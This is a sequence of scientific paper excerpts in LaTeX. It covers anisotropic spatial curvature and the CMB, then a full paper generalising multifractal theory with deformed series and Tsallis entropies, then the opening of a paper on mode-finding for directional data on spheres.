These late time, anisotropic warps of the space-time geometry are all proportional to the current fractional energy density in curvature, $\Omega_{k_0}$. They can be observed in the present epoch if inflation does not last much longer than the minimum number of efolds required to achieve a sufficiently flat universe ($\sim 65$ efolds for high scale inflation). Anisotropic curvature leads to the warping of the angular size of standard rulers. This warping is a function of both the angle and orientation of the ruler in the sky. Consequently, this effect is immune to degeneracies from the expansion history of the universe since it affects rulers that are along the same line of sight but oriented differently.
The CMB is also warped by the anisotropic curvature. In addition to the geometric warping, the differential Hubble expansion $\Delta H$ also preferentially red shifts the energies of the CMB photons. This energy shift differentially changes the monopole temperature of the CMB giving rise to a quadrupole in the CMB. Furthermore, since the anisotropic curvature is a late time effect, it affects all the modes that can be seen in the CMB. Consequently, this effect leads to statistical anisotropy on all angular scales. This effect is different from other signatures of anisotropy considered in the literature \cite{Gumrukcuoglu:2007bx, Gumrukcuoglu:2008gi}. Previous work has concentrated on the correlations that are produced due to the initial anisotropy in the universe at the beginning of inflation. Since these modes are roughly stretched to the Hubble size today, these initial anisotropies only affect the largest modes in the sky and are hence low l effects in the CMB. The late time anisotropy however warps the entire sky and leads to statistically robust correlations on all angular scales. The anisotropies in the pre-inflationary vacuum can however lead to other interesting signatures, for example in the gravitational wave spectrum \cite{Gumrukcuoglu:2008gi}. These signatures are an independent check of this scenario. Anisotropies that affect all angular scales have also been previously considered \cite{Ackerman:2007nb, Boehmer:2007ut}. These required violations of rotational invariance during inflation and the anisotropy emerges directly in the primordial density perturbations. In our case, the density perturbations are isotropic and the anisotropy observed today is a result of a late time warp of the space-time.
Anisotropic curvature is already more stringently constrained than isotropic curvature. While isotropic curvature is bounded to be $\lessapprox 10^{-2}$, it is difficult for anisotropic curvature to be much larger than $\sim 10^{-4}$ without running afoul of current data, in particular, the size of the CMB quadrupole. Since the measurement of curvature is ultimately limited by cosmic variance $\sim 10^{-5}$, there is a window between $ 10^{-5} \lessapprox \Omega_{k_0} \lessapprox 10^{-4}$ that can be probed by upcoming experiments, including Planck.
Future cosmological measurements like the 21 cm experiments will significantly improve bounds on the curvature of the universe. A discovery of isotropic curvature would be evidence suggesting that our ancestor vacuum had at least three large space dimensions. On the other hand, a discovery of anisotropic curvature would be strong evidence for the lower dimensionality of our parent vacuum. The anisotropy produced from such a transition has a very specific form due to the symmetries of the transition. It leads to correlations only amongst certain modes in the CMB (for example, only $A^{20}_{ll}$ and $A^{20}_{l, l-2}$). This distinguishes it from a generic anisotropic $3+1$ dimensional pre-inflationary vacuum which will generically have power in all modes. In these scenarios, it is also natural for the universe to have non-trivial topology. The existence of a non-trivial topological scale within our observable universe can be searched for using the classic ``circles
in the sky" signal. If both the non-trivial topology and anisotropic curvature can be discovered, implying a period of inflation very close to the catastrophic boundary, it would be powerful evidence for a lower dimensional ancestor vacuum. A discovery of these effects would establish the existence of vacua vastly different from our own Standard Model vacuum, lending observational credence to the landscape.
\begin{comment}
- the delta H comes back at late times just like curvature
- we have a high-l observable, not just low-l
these guys \cite{Gumrukcuoglu:2007bx} compute the correlators Alm in an initially anisotropic universe but they only find an effect for the lowest l's precisely because they don't have our anisotropic curvature so don't have our late time effect!
- this anisotropic signal is a different way of probing curvature, not subject to the usual degeneracy with expansion history
- there may also be interesting gravity wave signatures of our scenario \cite{Gumrukcuoglu:2008gi}
- even if curvature is observed at $10^-2$ (and our signal not seen) then we know ancestor vacuum had 3 or more large spatial dimensions
\end{comment}
\section*{Acknowledgments}
We would like to thank Savas Dimopoulos, Sergei Dubovsky, Ben Freivogel, Steve Kahn, John March-Russell, Stephen Shenker, Leonard Susskind, and Kirsten Wickelgren for useful discussions and the Dalitz Institute at Oxford for hospitality. S.R. was supported by the DOE Office of Nuclear Physics under grant DE-FG02-94ER40818. S.R. is also supported by NSF grant PHY-0600465.
While this work was in progress we became aware of interesting work by another group working on different signals of a similar general framework \cite{BlancoPillado:2010uw}.
| 2024-02-18T23:40:01.180Z | 2010-09-29T02:00:42.000Z | algebraic_stack_train_0000 | 1,102 | 12,605 |
|
proofpile-arXiv_065-5439 | \section{Introduction}
Fractal conception \cite{Mandel} has become a widespread idea in contemporary
science (see Refs. \cite{2,Feder,Sor} for review). Characteristic feature of
fractal sets is known to be the self-similarity: if one takes a part of the
whole set, it looks like the original set after appropriate scaling. Formal
basis of the self-similarity is the power-law function $F\sim\ell^{h}$ with the
Hurst exponent $h$ (for time series, value $F$ is reduced to the fluctuation
amplitude and $\ell$ is the interval size within which this amplitude is
determined). While the simple case of monofractal is characterized by a single
exponent $h$, a multifractal system is described by a continuous spectrum of
exponents, singularity spectrum $h(q)$ with argument $q$ being the exponent
deforming measures of elementary boxes that cover the fractal set \cite{multi}.
On the other hand, the parameter $q$ represents a self-similarity degree of a
homogeneous function being intrinsic in self-similar systems \cite{Erzan} (in
this way, within nonextensive thermostatistics, this exponent expresses the
escort probability $P_i\propto p_i^q$ in terms of the original one $p_i$
\cite{T,BS}). In physical applications, a key role is played by the partition
function $Z_q\sim\ell^{\tau(q)}$ with $\ell$ as a characteristic size of boxes
covering multifractal and the exponent $\tau(q)$ connected with the generalized
Hurst exponent $h(q)$ by the relation $\tau(q)=qh(q)-1$.
As fractals are scale invariant sets, it is natural to apply the quantum
calculus to describe multifractals. Indeed, quantum analysis is based on the
Jackson derivative
\begin{equation}
\mathcal{D}_x^\lambda=\frac{\lambda^{x\partial_x}-1}{(\lambda-1)x},\quad
\partial_x\equiv\frac{\partial}{\partial x}
\label{1}
\end{equation}
that yields variation of a function $f(x)$ with respect to the scaling
deformation $\lambda$ of its argument \cite{QC,Gasper}. First, this idea has
been realized in the work \cite{Erzan} where support space of multifractal has
been proposed to deform by means of action of the Jackson derivative (\ref{1})
on the variable $x$ reduced to the size $\ell$ of covering boxes. In this
letter, we use quite different approach wherein deformation is applied to the
multifractal parameter $q$ itself to vary it by means of finite dilatation
$(\lambda-1)q$ instead of infinitesimal shift ${\rm d}q$. We demonstrate below
that related description allows one to generalize definitions of the partition
function, the mass exponent, and the averages of random variables on the basis
of deformed expansion in power series over difference $q-1$. We apply the
formalism proposed to consideration of multifractals in mathematical physics
(the Cantor binomial set), econophysics (exchange currency series), and solid
state physics (porous surface condensates).
\section{Formulation of the problem}
Following the standard scheme \cite{multi,Feder}, we consider a multifractal
set covered by elementary boxes $i=1,2,\dots,W$ with $W\to\infty$. Its
properties are known to be determined by the partition function
\begin{equation}
Z_q=\sum_{i=1}^W p_i^q
\label{Z}
\end{equation}
that takes the value $Z_q=1$ at $q=1$, in accordance with the normalization
condition. Since $p_i\leq 1$ for all boxes $i$, the function (\ref{Z})
decreases monotonically from maximum magnitude $Z_q=W$ related to $q=0$ to
extreme values $Z_q\simeq p_{\rm ext}^q$ which are determined in the
$|q|\to\infty$ limit by maximum probability $p_{\rm max}$ on the positive
half-axis $q>0$ and minimum magnitude $p_{\rm min}$ on the negative one. In the
simplest case of the uniform distribution $p_i=1/W$ fixed by the statistical
weight $W\gg 1$, one has the exponential decay $Z_q=W^{1-q}$.
The corner stone of our approach is a generalization of the partition function
(\ref{Z}) by means of introducing a deformation parameter $\lambda$ which
defines, together with the self-similarity degree $q$, {\it a modified
partition function} $\mathcal{Z}_q^\lambda$ reduced to the standard form $Z_q$
at $\lambda=1$. To find the explicit form of the function
$\mathcal{Z}_q^\lambda$ we expand the difference
$\mathcal{Z}_q^\lambda-Z_{\lambda}$ into the deformed series over powers of the
difference $q-1$:
\begin{equation}
\mathcal{Z}_q^\lambda:=Z_{\lambda}
-\sum\limits_{n=1}^\infty\frac{\mathcal{S}_{\lambda}^{(n)}}
{[n]_\lambda!}(q-1)_\lambda^{(n)},\quad Z_{\lambda}=\sum_{i=1}^W p_i^{\lambda}.
\label{Z1}
\end{equation}
For arbitrary $x$ and $a$, the deformed binomial \cite{QC,Gasper}
\begin{equation} \label{8}
\begin{split}
(x+a)_\lambda^{(n)}&=(x+a)(x+\lambda a)\dots(x+\lambda^{n-1}a)
\\ &=\sum\limits_{m=0}^n\left[{n\atop
m}\right]_\lambda \lambda^{\frac{m(m-1)}{2}}x^m a^{n-m},\ n\geq 1
\end{split}
\end{equation}
is determined by the coefficients $\left[{n\atop
m}\right]_\lambda=\frac{[n]_\lambda!}{[m]_\lambda![n-m]_\lambda!}$ where
generalized factorials $[n]_\lambda!=[1]_\lambda[2]_\lambda\dots[n]_\lambda$
are given by the basic deformed numbers
\begin{equation}
[n]_\lambda=\frac{\lambda^n-1}{\lambda-1}.
\label{10}
\end{equation}
The coefficients of the expansion (\ref{Z1})
\begin{equation}
\mathcal{S}_{\lambda}^{(n)}=-\left.\big(q\mathcal{D}_q^\lambda\big)^n
Z_q\right|_{q=1},\quad n\geq 1
\label{Z2}
\end{equation}
are defined by the $n$-fold action of the Jackson derivative (\ref{1}) on the
original partition function (\ref{Z}).
\section{Generalized entropies}
Simple calculations arrive at the explicit expression
\begin{equation}
\mathcal{S}_\lambda^{(n)}=
-\frac{\left[Z_\lambda-1\right]^{(n)}}{(\lambda-1)^n},\quad n\geq 1.
\label{kernel}
\end{equation}
Hereafter, we use {\it the functional binomial}
\begin{equation}
\left[x_t+a\right]^{(n)}:=\sum\limits_{m=0}^n{n\choose m}x_{t^m}a^{n-m}
\label{binomial}
\end{equation}
defined with the standard binomial coefficients ${n\choose
m}=\frac{n!}{m!(n-m)!}$ for an arbitrary function $x_t=x(t)$ and a constant
$a$. The definition (\ref{binomial}) is obviously reduced to the Newton
binomial for the trivial function $x_t=t$. The most crucial difference of the
functional binomial from the ordinary one is displayed at $a=-1$ in the limit
$t\to 0$, when all terms of the sum (\ref{binomial}), apart from the first
$x_{t^0}=x_1$, are proportional to $x_{t^m}\to x_0$ to give
\begin{equation}
\lim_{t\to 0}\left[x_t-1\right]^{(n)}=(-1)^n(x_1-x_0).
\label{limit}
\end{equation}
At $t=1$, one has $\left[x_1-1\right]^{(n)}=0$.
It is easy to see the set of coefficients (\ref{kernel}) is expressed in terms
of the Tsallis entropy \cite{T}
\begin{equation}
S_\lambda=-\sum_i\ln_\lambda(p_i)p_i^\lambda=-\frac{Z_\lambda -1}{\lambda-1}
\label{S}
\end{equation}
where the generalized logarithm
$\ln_\lambda(x)=\frac{x^{1-\lambda}-1}{1-\lambda}$ is used. As the $\lambda$
deformation grows, this entropy decreases monotonically taking the
Boltzmann-Gibbs form $S_1=-\sum_i p_i\ln(p_i)$ at $\lambda=1$. Obvious equality
\begin{equation}
\mathcal{S}_\lambda^{(n)}=-\frac{\left[(1-\lambda)S_\lambda\right]^{(n)}}
{(\lambda-1)^n},\quad n\geq 1
\label{K}
\end{equation}
expresses in explicit form the entropy coefficients (\ref{kernel}) in terms of
the Tsallis entropy (\ref{S}) that relates to manifold deformations
$\lambda^m$, $0\leq m\leq n$. At $\lambda=0$ when $Z_0=W$, the limit
(\ref{limit}) gives
$\left[S_0\right]^{(n)}=\left[Z_0-1\right]^{(n)}=(-1)^{n-1}(W-1)$, so that
$\mathcal{S}_{0}^{(n)}=W-1\simeq W$. Respectively, in the limit $\lambda\to 1$
where $S_\lambda\to S_1$ and
$\left[(1-\lambda)S_\lambda\right]^{(n)}\to(1-\lambda)^nS_1^n$, one obtains the
sign-changing values $\mathcal{S}_{1}^{(n)}\to (-1)^{n-1}S_1^n$. Finally, the
limit $|\lambda|\to\infty$ where $S_\lambda\sim\lambda^{-1}$ and
$\left[(1-\lambda)S_\lambda\right]^{(n)}\sim(-1)^n$ is characterized by the
sign-changing power asymptotics
$\mathcal{S}_{\lambda}^{(n)}\sim(-1)^{n-1}\lambda^{-n}$.
For the uniform distribution when $Z_\lambda=W^{1-\lambda}$, the dependence
(\ref{S}) is characterized by the value $S_0\simeq W$ in the limit $\lambda\ll
1$ and the asymptotics $S_\lambda\sim 1/\lambda$ at $\lambda\gg 1$ (in the
point $\lambda=1$, one obtains the Boltzmann entropy $S_1=\ln(W)$). As a
result, with the $\lambda$ growth along the positive half-axis, the
coefficients (\ref{kernel}) decrease from the magnitude
$\mathcal{S}_{0}^{(n)}\simeq W$ to the sign-changing values
$\mathcal{S}_{1}^{(n)}=(-1)^{n-1}\left[\ln(W)\right]^n$ and then tend to the
asymptotics $\mathcal{S}_{\lambda}^{(n)}\sim(-1)^{n-1}\lambda^{-n}$; with the
$|\lambda|$ growth along the negative half-axis, the coefficients
(\ref{kernel}) vary non-monotonic tending to
$\mathcal{S}_{\lambda}^{(n)}\sim-|\lambda|^{-n}$ at $\lambda\to-\infty$.
\section{Generalized fractal dimensions}
Within pseudo-thermodynamic picture of multifractal sets \cite{BS}, effective
values of the free energy $\tau_q$, the internal energy $\alpha$, and the
entropy $f$ are defined as follows:
\begin{equation}\label{fa}
\tau_q=\frac{\ln(Z_q)}{\ln(\ell)},\ \alpha=\frac{\sum_i P_i\ln
p_i}{\ln(\ell)},\ f=\frac{\sum_i P_i\ln P_i}{\ln(\ell)}.
\end{equation}
Here, $\ell\ll 1$ stands for a scale, $p_i$ and $P_i$ are original and escort
probabilities connected with the definition
\begin{equation}\label{prob}
P_i(q)=\frac{p_i^q}{\sum_i p_i^q}=\frac{p_i^q}{Z_q}.
\end{equation}
Inserting the last equation into the second expression (\ref{fa}), one obtains
the Legendre transform $\tau_q=q\alpha_q-f(\alpha_q)$ where $q$ plays the role
of the inverse temperature and the internal energy is specified with the state
equation $\alpha_q=\frac{{\rm d}\tau_q}{{\rm d}q}$ \cite{Feder}. It is easy to
convince the escort probability (\ref{prob}) is generated by the mass exponent
given by the first definition (\ref{fa}) with accounting eq. (\ref{Z}):
\begin{equation}\label{P}
qP_i(q)=\ln(\ell)p_i\frac{\partial\tau_q}{\partial
p_i}=\frac{\partial\ln(Z_q)}{\partial \ln(p_i)}.
\end{equation}
Along the line of the generalization proposed, we introduce further {\it a
deformed mass exponent} $\tau_q^\lambda$ related to the original one $\tau_q$
according to the condition $\tau_q=\lim_{\lambda\to 1}\tau_q^\lambda$. By
analogy with eq. (\ref{Z1}), we expand this function into the deformed series
\begin{equation}
\tau_q^\lambda:=
\sum\limits_{n=1}^\infty\frac{D_{\lambda}^{(n)}}{[n]_\lambda!}(q-1)_\lambda^{(n)}
\label{tau}
\end{equation}
being the generalization of the known relation $\tau_q=D_q(q-1)$ connecting the
mass exponent $\tau_q$ with the multifractal dimension spectrum $D_q$
\cite{Feder}. Similarly to eqs. (\ref{Z2}, \ref{kernel}), the coefficients
$D_{\lambda}^{(n)}$ are expressed in the form
\begin{equation}
D_\lambda^{(n)}=\left.\big(q\mathcal{D}_q^\lambda\big)^n
\tau_q\right|_{q=1}=\frac{\left[\tau_\lambda-1\right]^{(n)}}{(\lambda-1)^n},\quad
n\geq 1
\label{DD}
\end{equation}
where the use of the definition (\ref{binomial}) assumes the term with $m=0$
should be suppressed because $\tau_{\lambda^0}=0$. At $n=1$, the last equation
(\ref{DD}) is obviously reduced to the ordinary form
$D_\lambda^{(1)}=\tau_{\lambda}/(\lambda-1)$, while the coefficients
$D_{\lambda}^{(n)}$ with $n>1$ include terms proportional to $\tau_{\lambda^m}$
to be related to manifold deformations $\lambda^m$, $1<m\leq n$. To this end,
the definition (\ref{DD}) yields a hierarchy of the multifractal dimension
spectra related to multiplying deformations of different powers $n$.
Making use of the limit (\ref{limit}), where the role of a function $x_t$ is
played by the mass exponent $\tau_\lambda$ with $\tau_0=-1$ and $\tau_1=0$,
gives the value $\left[\tau_0-1\right]^{(n)}=(-1)^n$ at the point $\lambda=0$,
where the coefficients (\ref{DD}) take the magnitude $D_0^{(n)}=1$ related to
the dimension of the support segment. In the limits $\lambda\to\pm\infty$,
behavior of the mass exponent $\tau_\lambda\simeq D_{\rm ext}\lambda$ is
determined by extreme values $D_{\rm ext}$ of the multifractal dimensions which
are reduced to the minimum magnitude $D_{\rm min}=D_{\infty}^{(n)}$ and the
maximum one $D_{\rm max}=D_{-\infty}^{(n)}$ \cite{Feder}. On the other hand, in
the limits $\lambda\to\pm\infty$, the extreme values $Z_{\lambda}\simeq p_{\rm
ext}^\lambda$ of the partition function (\ref{Z}) are determined by related
probabilities $p_{\rm ext}$. As a result, the first definition (\ref{fa}) gives
the mass exponents $\tau_\lambda\simeq\lambda\frac{\ln(p_{\rm
ext})}{\ln(\ell)}$ and the coefficients (\ref{DD}) tend to the minimum
magnitude $D_\infty^{(n)}\simeq\frac{\ln(p_{\rm max})}{\ln(\ell)}$ at
$\lambda\to\infty$ and the maximum one $D_{-\infty}^{(n)}\simeq\frac{\ln(p_{\rm
min})}{\ln(\ell)}$ at $\lambda\to-\infty$.
For the uniform distribution whose partition function is
$Z_\lambda=W^{1-\lambda}$, the expression $Z_\lambda:=\ell^{\tau_\lambda}$
gives the fractal dimension $D=\frac{\ln(W)}{\ln(1/\ell)}$ which tends to $D=1$
when the size of covering boxes $\ell$ goes to the inverse statistical weight
$1/W$. Being unique, this dimension relates to a monofractal with the mass
exponent $\tau_\lambda=D(\lambda-1)$ whose insertion into the definition
(\ref{DD}) arrives at the equal coefficients $D_\lambda^{(n)}=D$ for all orders
$n\geq 1$.
\section{Relations between generalized entropies and fractal dimensions}
Since either of the deformed series (\ref{Z1}) and (\ref{tau}) describes a
multifractal completely, their coefficients should be connected in some way. It
is easy to find an explicit relation between the first of these coefficients
$S_\lambda=\ln_\lambda\left(Z_\lambda^{\frac{1}{1-\lambda}}\right)$ and
$D_\lambda=\frac{\ln(Z_\lambda)}{(\lambda-1)\ln(\ell)}$ being the Tsallis
entropy $S_{\lambda}=\mathcal{S}_{\lambda}^{(1)}$ and the multifractal
dimension $D_{\lambda}=D_{\lambda}^{(1)}$. The use of the relation
$Z_\lambda=\ell^{\tau_\lambda}$, the connection
$\tau_\lambda=D_\lambda(\lambda-1)$, and the Tsallis exponential
$\exp_\lambda(x)=\left[1+(1-\lambda)x\right]^{\frac{1}{1-\lambda}}$ arrives at
the expressions
\begin{equation}
S_\lambda=\ln_\lambda\left(W^{D_\lambda}\right),\quad
D_\lambda=\frac{\ln\left[\exp_\lambda\left(S_\lambda\right)\right]}{\ln(W)}
\label{SDSD}
\end{equation}
where the statistical weight $W=1/\ell$ is used. Unfortunately, it is
impossible to set any closed relation between the coefficients (\ref{kernel})
and (\ref{DD}) at $n>1$. However, the use of the partition function
$Z_\lambda=W^{-D_\lambda(\lambda-1)}$ allows us to write
\begin{equation}
D_\lambda^{(n)}=\frac{\left[D_\lambda(\lambda-1)-1\right]^{(n)}}{(\lambda-1)^n},
\label{lambda}
\end{equation}
\begin{equation}
\mathcal{S}_{\lambda}^{(n)}=-\frac{\left[W^{-D_\lambda(\lambda-1)}-1\right]^{(n)}}
{(\lambda-1)^n}.
\label{entropy}
\end{equation}
Thus, knowing the first coefficients of expansions (\ref{Z1}) and (\ref{tau})
connected with the relations (\ref{SDSD}), one can obtain them for arbitrary
orders $n>1$.
\section{Random variable distributed over a multifracal set}
Let us consider an observable $\phi_i$ distributed over a multifracal set with
the average $\left<\phi\right>_q^\lambda=\sum_i
\phi_i\mathcal{P}_i(q,\lambda)$. Related probability is determined by the
equation
\begin{equation} \label{PP}
\lambda\mathcal{P}_i(q,\lambda):=p_i+\ln(\ell)p_i\frac{\partial\tau_q^\lambda}{\partial
p_i}
\end{equation}
that generalizes eq. (\ref{P}) for the escort probability due to the $\lambda$
deformation. With accounting eqs. (\ref{P} -- \ref{DD}), this average can be
expressed in terms of the deformed series
\begin{equation} \label{O}
\lambda\left<\phi\right>_q^\lambda=\left<\phi\right>+\sum\limits_{n=1}^\infty
\frac{\left[\lambda\left<\phi\right>_\lambda-1\right]^{(n)}}{[n]_\lambda!(\lambda-1)^{n}}
(q-1)_\lambda^{(n)}
\end{equation}
where $\left<\phi\right>=\sum_i\phi_i p_i$ and
$\left<\phi\right>_\lambda=\sum_i\phi_i P_i(\lambda)$. This equation allows one
to find the mean value $\left<\phi\right>_q^\lambda$ versus the self-similarity
degree $q$ at the $\lambda$ deformation fixed. In the case $\lambda=q$ when
definition (\ref{8}) gives $(q-1)_q^{(n)}=0$ for $n>1$, the equation (\ref{O})
arrives at the connection $\left<\phi\right>_q^q=\left<\phi\right>_q$ between
mean values related to generalized and escort probabilities given by eqs.
(\ref{PP}) and (\ref{P}), respectively. At the point $\lambda=0$ where
according to eqs. (\ref{8}, \ref{10}, \ref{limit})
$(q-1)_0^{(n)}=(q-1)q^{n-1}$, $[n]_0!=1$ and
$\left[\lambda\left<\phi\right>_\lambda-1\right]^{(n)}\to(-1)^n\left<\phi\right>$,
eq. (\ref{O}) is reduced to identity; here, one has the uniform distribution
$P_i(q,0)=1/W$ for an arbitrary $p_i$ and the average is
$\left<\phi\right>_q^0=W^{-1}\sum_i \phi_i$. At $\lambda=1$ when
$\left[\left<\phi\right>_1-1\right]^{(n)}=0$, the equation (\ref{O}) arrives at
the ordinary average $\left<\phi\right>=\sum_i\phi_i p_i$ because the
distribution $P_i(q,1)$ is reduced to $p_i$. Setting $\sum_{n=1}^\infty
(-1)^{n-1}\left<\phi\right>_{\lambda^n}\to\left<\phi\right>_\infty$ for
$\lambda\gg 1$ where
$(q-1)_\lambda^{(n)}\sim(-1)^{n-1}(q-1)\lambda^{n(n-1)/2}$,
$[n]_\lambda!\sim\lambda^{n(n-1)/2}$ and
$\left[\lambda\left<\phi\right>_\lambda-1\right]^{(n)}\sim\lambda^n\left<\phi\right>_{\lambda^n}$,
one obtains the simple dependence
$\lambda\left<\phi\right>_q^\lambda=\left<\phi\right>+(q-1)\left<\phi\right>_\infty$,
according to which the average $\left<\phi\right>_q=\left<\phi\right>_q^q$
tends to the limit $\left<\phi\right>_\infty$ with the $q$-growth.
\section{Examples}
To demonstrate the approach developed we consider initially the simplest
example of the Cantor binomial set \cite{Feder}. It is generated by the
$N$-fold dividing of the unit segment into equal parts with elementary lengths
$\ell=(1/2)^N$, then each of these is associated with binomially distributed
products $p^m(1-p)^{N-m}$, $m=0,1,\dots,N$ of probabilities $p$ and $1-p$. In
such a case, the partition function (\ref{Z}) takes the form
$Z_q=\left[p^{q}+(1-p)^{q}\right]^N$ to be equal $Z_q=\ell^{\tau_q}$ with the
mass exponent $\tau_q=\frac{\ln\left[p^{q}+(1-p)^{q}\right]}{\ln(1/2)}$
\cite{Feder}. Related dependencies of the fractal dimension coefficients
(\ref{lambda}) on the deformation parameter are depicted in Figure
\ref{Dimensions} for different orders $n$ and probabilities $p$.
\begin{figure}[!h]
\centering
\includegraphics[width=70mm]{p02.pdf}\\
\includegraphics[width=70mm]{n2.pdf}
\caption{Fractal dimension coefficients (\ref{lambda}) versus deformation
of the Cantor binomial set at $p=0.2$ (a) and $n=2$ (b)
(curves 1 -- 4 correspond to $n=1, 2, 3, 4$ on the upper panel and $p=0.1, 0.2, 0.3, 0.4$
on the lower one).}
\label{Dimensions}
\end{figure}
As the upper panel shows, at the $p$ given the monotonic decay of the fractal
dimension $D_\lambda^{(n)}$, being usual at $n=1$, transforms into the
non-monotonic dependencies, whose oscillations are the stronger the more the
order $n$ is. According to the lower panel, such behavior is kept with
variation of the $p$ probability, whose growth narrows the dimension spectrum.
In contrast to the fractal dimensions (\ref{lambda}), the entropy coefficients
(\ref{entropy}) depend on the effective number of particles $N$. This
dependence is demonstrated by example of the Tsallis entropy
$S_{\lambda}=\mathcal{S}_{\lambda}^{(1)}$ depicted in Figure \ref{Entropies}a:
with the deformation growth, this entropy decays
\begin{figure}[!h]
\centering
\includegraphics[width=70mm]{Sn1.pdf}\\
\includegraphics[width=70mm]{Sn.pdf}
\caption{Effective entropies (\ref{entropy})
of the Cantor binomial set at $p=0.2$ and:
a) $n=1$ (curves 1 -- 4 correspond to $N=1,4,8,12$);
b) $N=10$ (curves 1 -- 4 correspond to $n=1, 2, 3, 4$).}
\label{Entropies}
\end{figure}
the faster the more $N$ is (by this, the specific value $S_{\lambda}/N$ remains
constant at $\lambda=1$). According to Figure \ref{Entropies}b, with increase
of the order $n$, the monotonically decaying dependence
$\mathcal{S}_{\lambda}^{(1)}$ transforms into the non-monotonic one,
$\mathcal{S}_{\lambda}^{(n)}$, whose oscillations grow with $n$.
Characteristically, for arbitrary values $n$ and $p$, the magnitude
$\mathcal{S}_0^{(n)}$ (being equal $2^N$ for the Cantor binomial set) remains
constant.
As the second example we consider the time series of the currency exchange of
euro to US dollar in the course of the 2007 -- 2009 years which include
financial crisis (data are taken from website www.fxeuroclub.ru). To ascertain
the crisis effect we study the time series intervals before (January, 2007 --
May, 2008) and after crisis (June, 2008 -- October, 2009).\footnote{The point
of the crisis is fixed under condition of maximal value of the time series~dispersion.}
Moreover, we restrict ourselves by consideration of the
coefficients (\ref{lambda}) and (\ref{entropy}) of the lowest orders $n$ which
make it possible to visualize a difference between fractal characteristics of
the time series intervals pointed out. Along this way, we base on the method of
the multifractal detrended fluctuation analysis \cite{Kantel} to find the mass
exponent $\tau(q)$, whose use arrives at the dependencies depicted in Figure
\ref{currency}.
\begin{figure}[!h]
\centering
\includegraphics[width=70mm]{D1currency.pdf}\\
\includegraphics[width=70mm]{S1currency.pdf}\\
\includegraphics[width=70mm]{S2currency.pdf}
\caption{a) Fractal dimension coefficients (\ref{lambda})
at $n=1$ for the time series of the currency exchange of
euro to US dollar; related entropy coefficients (\ref{entropy})
at $n=1$ (b) and $n=2$ (c) (bold dots correspond to the
time interval before financial crisis, circles -- after crisis).}
\label{currency}
\end{figure}
Comparison of the data taken before and after financial crisis shows that it
affects already on the fractal dimension coefficient of the lowest order $n=1$,
but has not an effect on the Tsallis entropy related to $n=1$, while the
entropy coefficient of the second order $n=2$ is found to be strongly sensible
to the crisis. Thus, this example demonstrates visually that generalized
multifractal characteristics elaborated on the basis of the developed formalism
allow one to study subtle details of self-similarly evolved processes.
The last example is concerned with macrostructure of condensates which have
been obtained as result of sputtering of substances in accumulative ion-plasma
devices \cite{Perekr}. The peculiarity of such a process is that its use has
allowed to obtain the porous condensates type of those that are shown in
Figures \ref{surface}a and \ref{surface}b for carbon and titanium,
respectively.
\begin{figure}[!h]
\centering
a\hspace{5.5cm}b\\
\vspace{0.2cm}
\includegraphics[width=120mm]{CTi.pdf}\\
\vspace{0.2cm}
c\hspace{5.5cm}d\\
\includegraphics[width=60mm]{D1surface.pdf}\includegraphics[width=60mm]{S1surface.pdf}
\caption{Scanning electron microscopy images of {\it ex-situ} grown carbon (a)
and titanium (b) condensates; corresponding fractal dimensions (c) and entropies (d)
at $n=1$ (curves 1, 2 relate to carbon and titanium).}
\label{surface}
\end{figure}
These condensates are seen to have apparent fractal macrostructure, whose
handling gives the fractal dimension spectra and the entropies depicted in
Figures \ref{surface}c and \ref{surface}d, respectively. Comparing these
dependencies, we can convince that difference between the carbon condensate,
which has strongly rugged surface, with the titanium one, becomes apparent
already at use of the fractal dimension and entropy coefficients
(\ref{lambda}), (\ref{entropy}) related to the lowest order $n=1$. Thus, in the
case of multifractal objects with strongly different structures the use of
usual multifractal characteristics is appeared to be sufficient.
\section{Conclusion}
Generalizing the multifractal theory \cite{multi}, we have represented the
partition function (\ref{Z1}), the mass exponent (\ref{tau}), and the average
$\left<\phi\right>_q^\lambda$ of self-similarly distributed random variable as
deformed series in power of difference $q-1$. Coefficients of these expansions
are shown to be determined by the functional binomial (\ref{binomial}) that
expresses both multifractal dimension spectra (\ref{lambda}) and generalized
Tsallis entropies (\ref{entropy}) related to manifold deformations. We have
found eq. (\ref{O}) for the average related to the generalized probability
(\ref{PP}) subject to the deformation. Recently, making use of above formalism
has allowed us to develop a field theory for self-similar statistical systems
\cite{OSh}.
As examples of multifractal sets in the mathematical physics, objects of the
solid state physics, and processes in the econophysics, we have applied the
formalism developed to consideration of the Cantor manifolds, porous surface
condensates, and exchange currency series, respectively. The study of the
Cantor set has shown that both fractal dimension coefficients (\ref{lambda})
and entropies (\ref{entropy}) coincide with usual multifractal characteristics
in the lowest order $n=1$, but display very complicated behaviour at $n>1$. On
the contrary, consideration of both carbon and titanium surface condensates has
shown that their macrostructures can be characterized by use of usual fractal
dimension and entropy coefficients related to the order $n=1$. Much more
complicated situation takes place in the case of the time series type of
currency exchange series. Here, a difference between various series is
displayed for the fractal dimension coefficients already in the lowest order
$n=1$, but the entropy coefficients coincide at $n=1$, but become different at
$n=2$. This example demonstrates the need to use generalized multifractal
characteristics obtained within framework of the formalism developed.
| 2024-02-18T23:40:01.269Z | 2010-03-01T20:18:43.000Z | algebraic_stack_train_0000 | 1,106 | 4,306 |
|
proofpile-arXiv_065-5503 | \section{Introduction}
\label{Sec:Intro}
A directional data set (or simply directional data) is the collection of observations on a (hyper)sphere.
It occurs in many scientific problems when measurements are taken on the surface of a spherical object, such as Earth or other planets.
For instance, the locations of earthquakes are often represented by their longitudes and latitudes
\citep{taylor2009active, craig2011earthquake};
thus, the locations can be viewed as random variables on a two-dimensional (2D) sphere.
In astronomical surveys,
the locations of galaxies are usually recorded by their angular positions (right ascensions and declinations) in the sky, leading
to observations on a 2D sphere \citep{york2000sloan,skrutskie2006two, abbott2016dark}.
In planetary science, observations often comprise locations on a planet, such as Mars,
and can also be considered as random variables on a 2D sphere \citep{Lakes_On_Mars,BARLOW2015,Unif_test_hypersphere2020}.
These observations on a sphere can be regarded as independently and identically distributed random variables from a density function supported on the sphere (called a directional density function).
The local modes of a density function are often of research interest because they signal high density areas \citep{scott2012multivariate}
and can be used to cluster data \citep{MS_Density_ridge2018,chacon2020modal}.
However, identifying the local modes of a directional density function is a nontrivial task that involves both statistical and computational challenges.
From a statistical perspective, it is necessary to obtain an accurate estimator of the underlying directional density (as well as its derivatives). From a computational perspective, it is needful to design an algorithm to efficiently compute the local modes of the density estimator.
